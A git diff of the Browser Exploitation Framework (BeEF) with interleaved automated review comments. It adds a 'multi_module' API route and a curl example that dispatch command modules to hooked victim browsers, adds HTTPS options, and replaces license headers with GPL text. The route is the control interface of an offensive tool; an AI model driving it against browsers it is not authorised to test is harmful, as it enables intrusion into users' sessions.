+ # + # POST request body example (for modules that don't need parameters, just pass an empty JSON object like {} ) + #{ "hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj", + # "modules": [ + # { # test_return_long_string module with custom input + # "mod_id":99, + # "mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}] + # }, + # { # prompt_dialog module with custom input + # "mod_id":116, + # "mod_input":[{"question":"hooked?"}] + # }, + # { # alert_dialog module without input (using default input, if any) + # "mod_id":128, + # "mod_input":[] + # } + # ] + # } + # response example: {"99":7,"116":8,"128":0} # <- This means the alert_dialog had issues (see return value 0) + # + # curl example (test_return_long_string and prompt_dialog module with custom inputs)): + # + #curl -H "Content-Type: application/json; charset=UTF-8" -d '{"hb":"vkIwVV3ok5i5vH2f8sxlkoaKqAGKCbZXdWqE9vkHNFBhI8aBBHvtZAGRO2XqFZXxThBlmKlRiVwPeAzj", + # "modules":[{"mod_id":99,"mod_input":[{"repeat":"10"},{"repeat_string":"ABCDE"}]},{"mod_id":116,"mod_input":[{"question":"hooked?"}]},{"mod_id":128,"mod_input":[]}]}' + # -X POST http://127.0.0.1:3000/api/modules/multi_module?token=e640483ae9bca2eb904f003f27dd4bc83936eb92 + # + post '/multi_module' do + request.body.rewind + begin + body = JSON.parse request.body.read + hb = BeEF::Core::Models::HookedBrowser.first(:session => body["hb"]) + error 401 unless hb != nil + + results = Hash.new + if body["modules"] != nil + body["modules"].each{|mod| + mod_id = mod["mod_id"] + mod_k = BeEF::Module.get_key_by_database_id mod["mod_id"] + if mod_k == nil + results[mod_id] = 0 + next + else + mod_params = [] + mod["mod_input"].each{|input| + input.each{|k,v| + mod_params.push({'name' => k, 'value' => v}) + } + } + cmd_id = BeEF::Module.execute(mod_k, hb.session, mod_params) + results[mod_id] = cmd_id + end + } + end + results.to_json + rescue Exception => e + print_error "Invalid JSON input passed to endpoint 
/api/modules/multi" + error 400 # Bad Request + end + end end end end diff --git a/core/main/router/api.rb b/core/main/router/api.rb index 7bad31f33..3d2bc78d5 100644 --- a/core/main/router/api.rb +++ b/core/main/router/api.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core diff --git a/core/main/router/router.rb b/core/main/router/router.rb index e6ca7151b..958d29117 100644 --- a/core/main/router/router.rb +++ b/core/main/router/router.rb 
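Review bot: Both new routes (`post '/multi_browser'` and `post '/multi_module'`) wrap their whole body in `rescue Exception => e` and report every failure as "Invalid JSON input passed to endpoint /api/modules/multi". A missing `hb_ids` or `mod_input` (a NoMethodError on nil) is therefore logged as a JSON problem. A malformed entry partway through the list also returns 400 after earlier entries have already gone through `BeEF::Module.execute`, so the caller never gets those command ids. Rescue only the parse step with `rescue JSON::ParserError => e`, and validate the shape before the loop, e.g. `error 400 unless body["hb_ids"].is_a?(Array)` and the equivalent check on each `mod["mod_input"]`. The log message and the first curl example name `/api/modules/multi`, but the routes are `/multi_browser` and `/multi_module`; both should use the real paths.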
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/main/server.rb b/core/main/server.rb index d15ad9198..c0ddaee47 100644 --- a/core/main/server.rb +++ b/core/main/server.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF 
@@ -48,7 +38,8 @@ module BeEF 'beef_public' => @configuration.get('beef.http.public'), 'beef_public_port' => @configuration.get('beef.http.public_port'), 'beef_dns' => @configuration.get('beef.http.dns'), - 'beef_hook' => @configuration.get('beef.http.hook_file') + 'beef_hook' => @configuration.get('beef.http.hook_file'), + 'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http" } end @@ -61,9 +52,9 @@ module BeEF raise Exception::TypeError, '"url" needs to be a string' if not url.string? if args == nil - mounts[url] = http_handler_class + @mounts[url] = http_handler_class else - mounts[url] = http_handler_class, *args + @mounts[url] = http_handler_class, *args end print_debug("Server: mounted handler '#{url}'") end @@ -108,6 +99,13 @@ module BeEF @configuration.get('beef.http.host'), @configuration.get('beef.http.port'), @rack_app) + + if @configuration.get('beef.http.https.enable') == true + @http_server.ssl = true + @http_server.ssl_options = {:private_key_file => $root_dir + "/" + @configuration.get('beef.http.https.key'), + :cert_chain_file => $root_dir + "/" + @configuration.get('beef.http.https.cert'), + :verify_peer => false} + end end end diff --git a/core/module.rb b/core/module.rb index bb4fd29ed..4856008ef 100644 --- a/core/module.rb +++ b/core/module.rb 
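Review bot: In the HTTPS block of server.rb, the key and certificate paths are built with `$root_dir + "/" + ...` and passed to `ssl_options` without checking that either file exists or is readable. A wrong `beef.http.https.key` or `beef.http.https.cert` value would probably only surface when TLS is first used; the server library's behaviour is not visible here. Building the path with `File.join($root_dir, @configuration.get('beef.http.https.key'))` and failing early with `raise "HTTPS key not readable: #{key}" unless File.readable?(key)` (same for the certificate) gives a clear startup error. A short comment that `:verify_peer => false` means client certificates are not requested would also help readers who might take it for disabled server verification. The enclosing method starts above the hunk.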
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Module diff --git a/core/modules.rb b/core/modules.rb index 37d7ac953..5dff69520 100644 --- a/core/modules.rb +++ b/core/modules.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Modules diff --git a/core/ruby.rb b/core/ruby.rb index d606555f9..b1d2f53f7 100644 --- a/core/ruby.rb +++ b/core/ruby.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # @note Patching Ruby Security diff --git a/core/ruby/hash.rb b/core/ruby/hash.rb index 1ee46bec0..f24b3f30d 100644 --- a/core/ruby/hash.rb +++ b/core/ruby/hash.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Hash diff --git a/core/ruby/module.rb b/core/ruby/module.rb index 7fa3d53d4..3eb170caa 100644 --- a/core/ruby/module.rb +++ b/core/ruby/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Module diff --git a/core/ruby/object.rb b/core/ruby/object.rb index da57bcfd9..98de6419b 100644 --- a/core/ruby/object.rb +++ b/core/ruby/object.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Object diff --git a/core/ruby/patches/dm-do-adapter/adapter.rb b/core/ruby/patches/dm-do-adapter/adapter.rb index 9d5d92a60..01117ab86 100644 --- a/core/ruby/patches/dm-do-adapter/adapter.rb 
+++ b/core/ruby/patches/dm-do-adapter/adapter.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # diff --git a/core/ruby/print.rb b/core/ruby/print.rb index 138809b0c..417fbcdf1 100644 --- a/core/ruby/print.rb +++ b/core/ruby/print.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # Function used to print errors to the console diff --git a/core/ruby/security.rb b/core/ruby/security.rb index b3de1d769..34baa2813 100644 --- a/core/ruby/security.rb +++ b/core/ruby/security.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # @note Prevent exec from ever being used diff --git a/core/ruby/string.rb b/core/ruby/string.rb index 9f825ebab..7a83138d1 100644 --- a/core/ruby/string.rb +++ b/core/ruby/string.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class String diff --git a/core/settings.rb b/core/settings.rb index 0be0f6644..2230b7612 100644 --- a/core/settings.rb +++ b/core/settings.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Settings diff --git a/docs/COPYING b/docs/COPYING new file mode 100644 index 000000000..a6eac6ac6 --- /dev/null +++ b/docs/COPYING 
@@ -0,0 +1,348 @@ +COPYING -- Describes the terms under which the Browser Exploitation +Framework (BeEF) is distributed. A copy of the GNU General Public License +(GPL) is appended to this file. + +BeEF (Browser Exploitation Framework) is (C) 2006-2012 Wade Alcorn. + +This program is free software; you may redistribute and/or modify it under +the terms of the GNU General Public License as published by the Free +Software Foundation; Version 2 with the clarifications and exceptions +described below. This guarantees your right to use, modify, and +redistribute this software under certain conditions. If you wish to embed +BeEF technology into proprietary software, we sell alternative licenses +(contact wade@bindshell.net). + +Note that the GPL places important restrictions on "derived works", yet it +does not provide a detailed definition of that term. To avoid +misunderstandings, we interpret that term as broadly as copyright law +allows. For example, we consider an application to constitute a "derived +work" for the purpose of this license if it does any of the following: +* Integrates source code from BeEF. +* Reads or includes BeEF copyrighted hook, core components, tests, modules + or extensions. +* Executes BeEF and parses the results. +* Integrates/includes/aggregates BeEF into a proprietary executable + installer, such as those produced by InstallShield. +* Links to a library or executes a program that does any of the above + +The term "BeEF" should be taken to also include any portions or derived +works of BeEF. This list is not exclusive, but is meant to clarify our +interpretation of derived works with some common examples. Our +interpretation applies only to BeEF - we do not speak for other people's +GPL works. + +If you have any questions about the GPL licensing restrictions on using +BeEF in non-GPL works, we would be happy to help. As mentioned above, +we also offer alternative license to integrate BeEF into proprietary +applications and appliances. 
+ +If you received these files with a written license agreement or contract +stating terms other than the terms above, then that alternative license +agreement takes precedence over these comments. + +Source is provided to this software because we believe users have a right +to know exactly what a program is going to do before they run it. + +Source code also allows you to fix bugs and add new features. You are +highly encouraged to send your changes to wade@bindshell.net for possible +incorporation into the main distribution. By sending these changes to the +BeEF developers, to the mailing lists, or via Git pull request, checking +them into the BeEF source code repository, it is understood (unless you +specify otherwise) that you are offering the BeEF project the unlimited, +non-exclusive right to reuse, modify, and relicense the code. BeEF will +always be available Open Source, but this is important because the +inability to relicense code has caused devastating problems for other Free +Software projects (such as KDE and NASM). If you wish to specify special +license conditions of your contributions, just say so when you send them. + +This program is distributed in the hope that it will be useful, but +WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +General Public License v2.0 for more details at +http://www.gnu.org/licenses/gpl-2.0.html, or below + +**************************************************************************** + + GNU GENERAL PUBLIC LICENSE + Version 2, June 1991 + + Copyright (C) 1989, 1991 Free Software Foundation, Inc., + 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The licenses for most software are designed to take away your +freedom to share and change it. 
By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change free +software--to make sure the software is free for all its users. This +General Public License applies to most of the Free Software +Foundation's software and to any other program whose authors commit to +using it. (Some other Free Software Foundation software is covered by +the GNU Lesser General Public License instead.) You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +this service if you wish), that you receive source code or can get it +if you want it, that you can change the software or use pieces of it +in new free programs; and that you know you can do these things. + + To protect your rights, we need to make restrictions that forbid +anyone to deny you these rights or to ask you to surrender the rights. +These restrictions translate to certain responsibilities for you if you +distribute copies of the software, or if you modify it. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must give the recipients all the rights that +you have. You must make sure that they, too, receive or can get the +source code. And you must show them these terms so they know their +rights. + + We protect your rights with two steps: (1) copyright the software, and +(2) offer you this license which gives you legal permission to copy, +distribute and/or modify the software. + + Also, for each author's protection and ours, we want to make certain +that everyone understands that there is no warranty for this free +software. 
If the software is modified by someone else and passed on, we +want its recipients to know that what they have is not the original, so +that any problems introduced by others will not reflect on the original +authors' reputations. + + Finally, any free program is threatened constantly by software +patents. We wish to avoid the danger that redistributors of a free +program will individually obtain patent licenses, in effect making the +program proprietary. To prevent this, we have made it clear that any +patent must be licensed for everyone's free use or not licensed at all. + + The precise terms and conditions for copying, distribution and +modification follow. + + GNU GENERAL PUBLIC LICENSE + TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION + + 0. This License applies to any program or other work which contains +a notice placed by the copyright holder saying it may be distributed +under the terms of this General Public License. The "Program", below, +refers to any such program or work, and a "work based on the Program" +means either the Program or any derivative work under copyright law: +that is to say, a work containing the Program or a portion of it, +either verbatim or with modifications and/or translated into another +language. (Hereinafter, translation is included without limitation in +the term "modification".) Each licensee is addressed as "you". + +Activities other than copying, distribution and modification are not +covered by this License; they are outside its scope. The act of +running the Program is not restricted, and the output from the Program +is covered only if its contents constitute a work based on the +Program (independent of having been made by running the Program). +Whether that is true depends on what the Program does. + + 1. 
You may copy and distribute verbatim copies of the Program's +source code as you receive it, in any medium, provided that you +conspicuously and appropriately publish on each copy an appropriate +copyright notice and disclaimer of warranty; keep intact all the +notices that refer to this License and to the absence of any warranty; +and give any other recipients of the Program a copy of this License +along with the Program. + +You may charge a fee for the physical act of transferring a copy, and +you may at your option offer warranty protection in exchange for a fee. + + 2. You may modify your copy or copies of the Program or any portion +of it, thus forming a work based on the Program, and copy and +distribute such modifications or work under the terms of Section 1 +above, provided that you also meet all of these conditions: + + a) You must cause the modified files to carry prominent notices + stating that you changed the files and the date of any change. + + b) You must cause any work that you distribute or publish, that in + whole or in part contains or is derived from the Program or any + part thereof, to be licensed as a whole at no charge to all third + parties under the terms of this License. + + c) If the modified program normally reads commands interactively + when run, you must cause it, when started running for such + interactive use in the most ordinary way, to print or display an + announcement including an appropriate copyright notice and a + notice that there is no warranty (or else, saying that you provide + a warranty) and that users may redistribute the program under + these conditions, and telling the user how to view a copy of this + License. (Exception: if the Program itself is interactive but + does not normally print such an announcement, your work based on + the Program is not required to print an announcement.) + +These requirements apply to the modified work as a whole. 
If +identifiable sections of that work are not derived from the Program, +and can be reasonably considered independent and separate works in +themselves, then this License, and its terms, do not apply to those +sections when you distribute them as separate works. But when you +distribute the same sections as part of a whole which is a work based +on the Program, the distribution of the whole must be on the terms of +this License, whose permissions for other licensees extend to the +entire whole, and thus to each and every part regardless of who wrote it. + +Thus, it is not the intent of this section to claim rights or contest +your rights to work written entirely by you; rather, the intent is to +exercise the right to control the distribution of derivative or +collective works based on the Program. + +In addition, mere aggregation of another work not based on the Program +with the Program (or with a work based on the Program) on a volume of +a storage or distribution medium does not bring the other work under +the scope of this License. + + 3. You may copy and distribute the Program (or a work based on it, +under Section 2) in object code or executable form under the terms of +Sections 1 and 2 above provided that you also do one of the following: + + a) Accompany it with the complete corresponding machine-readable + source code, which must be distributed under the terms of Sections + 1 and 2 above on a medium customarily used for software interchange; or, + + b) Accompany it with a written offer, valid for at least three + years, to give any third party, for a charge no more than your + cost of physically performing source distribution, a complete + machine-readable copy of the corresponding source code, to be + distributed under the terms of Sections 1 and 2 above on a medium + customarily used for software interchange; or, + + c) Accompany it with the information you received as to the offer + to distribute corresponding source code. 
(This alternative is + allowed only for noncommercial distribution and only if you + received the program in object code or executable form with such + an offer, in accord with Subsection b above.) + +The source code for a work means the preferred form of the work for +making modifications to it. For an executable work, complete source +code means all the source code for all modules it contains, plus any +associated interface definition files, plus the scripts used to +control compilation and installation of the executable. However, as a +special exception, the source code distributed need not include +anything that is normally distributed (in either source or binary +form) with the major components (compiler, kernel, and so on) of the +operating system on which the executable runs, unless that component +itself accompanies the executable. + +If distribution of executable or object code is made by offering +access to copy from a designated place, then offering equivalent +access to copy the source code from the same place counts as +distribution of the source code, even though third parties are not +compelled to copy the source along with the object code. + + 4. You may not copy, modify, sublicense, or distribute the Program +except as expressly provided under this License. Any attempt +otherwise to copy, modify, sublicense or distribute the Program is +void, and will automatically terminate your rights under this License. +However, parties who have received copies, or rights, from you under +this License will not have their licenses terminated so long as such +parties remain in full compliance. + + 5. You are not required to accept this License, since you have not +signed it. However, nothing else grants you permission to modify or +distribute the Program or its derivative works. These actions are +prohibited by law if you do not accept this License. 
Therefore, by +modifying or distributing the Program (or any work based on the +Program), you indicate your acceptance of this License to do so, and +all its terms and conditions for copying, distributing or modifying +the Program or works based on it. + + 6. Each time you redistribute the Program (or any work based on the +Program), the recipient automatically receives a license from the +original licensor to copy, distribute or modify the Program subject to +these terms and conditions. You may not impose any further +restrictions on the recipients' exercise of the rights granted herein. +You are not responsible for enforcing compliance by third parties to +this License. + + 7. If, as a consequence of a court judgment or allegation of patent +infringement or for any other reason (not limited to patent issues), +conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot +distribute so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you +may not distribute the Program at all. For example, if a patent +license would not permit royalty-free redistribution of the Program by +all those who receive copies directly or indirectly through you, then +the only way you could satisfy both it and this License would be to +refrain entirely from distribution of the Program. + +If any portion of this section is held invalid or unenforceable under +any particular circumstance, the balance of the section is intended to +apply and the section as a whole is intended to apply in other +circumstances. 
+ +It is not the purpose of this section to induce you to infringe any +patents or other property right claims or to contest validity of any +such claims; this section has the sole purpose of protecting the +integrity of the free software distribution system, which is +implemented by public license practices. Many people have made +generous contributions to the wide range of software distributed +through that system in reliance on consistent application of that +system; it is up to the author/donor to decide if he or she is willing +to distribute software through any other system and a licensee cannot +impose that choice. + +This section is intended to make thoroughly clear what is believed to +be a consequence of the rest of this License. + + 8. If the distribution and/or use of the Program is restricted in +certain countries either by patents or by copyrighted interfaces, the +original copyright holder who places the Program under this License +may add an explicit geographical distribution limitation excluding +those countries, so that distribution is permitted only in or among +countries not thus excluded. In such case, this License incorporates +the limitation as if written in the body of this License. + + 9. The Free Software Foundation may publish revised and/or new versions +of the General Public License from time to time. Such new versions will +be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + +Each version is given a distinguishing version number. If the Program +specifies a version number of this License which applies to it and "any +later version", you have the option of following the terms and conditions +either of that version or of any later version published by the Free +Software Foundation. If the Program does not specify a version number of +this License, you may choose any version ever published by the Free Software +Foundation. + + 10. 
If you wish to incorporate parts of the Program into other free +programs whose distribution conditions are different, write to the author +to ask for permission. For software which is copyrighted by the Free +Software Foundation, write to the Free Software Foundation; we sometimes +make exceptions for this. Our decision will be guided by the two goals +of preserving the free status of all derivatives of our free software and +of promoting the sharing and reuse of software generally. + + NO WARRANTY + + 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY +FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN +OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED +OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS +TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE +PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, +REPAIR OR CORRECTION. + + 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR +REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, +INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING +OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED +TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY +YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER +PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + + END OF TERMS AND CONDITIONS + +**************************************************************************** + diff --git a/docs/boilerplate b/docs/boilerplate new file mode 100644 index 000000000..d76a93909 --- /dev/null +++ b/docs/boilerplate 
@@ -0,0 +1,3 @@ +Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +Browser Exploitation Framework (BeEF) - http://beefproject.com +See the file 'doc/COPYING' for copying permission \ No newline at end of file diff --git a/extensions/admin_ui/api/command.rb b/extensions/admin_ui/api/command.rb index d1257fe64..c18dd991d 100644 --- a/extensions/admin_ui/api/command.rb +++ b/extensions/admin_ui/api/command.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/extensions/admin_ui/api/handler.rb b/extensions/admin_ui/api/handler.rb index 1f7973e73..e524f4caf 100644 --- a/extensions/admin_ui/api/handler.rb +++ b/extensions/admin_ui/api/handler.rb 
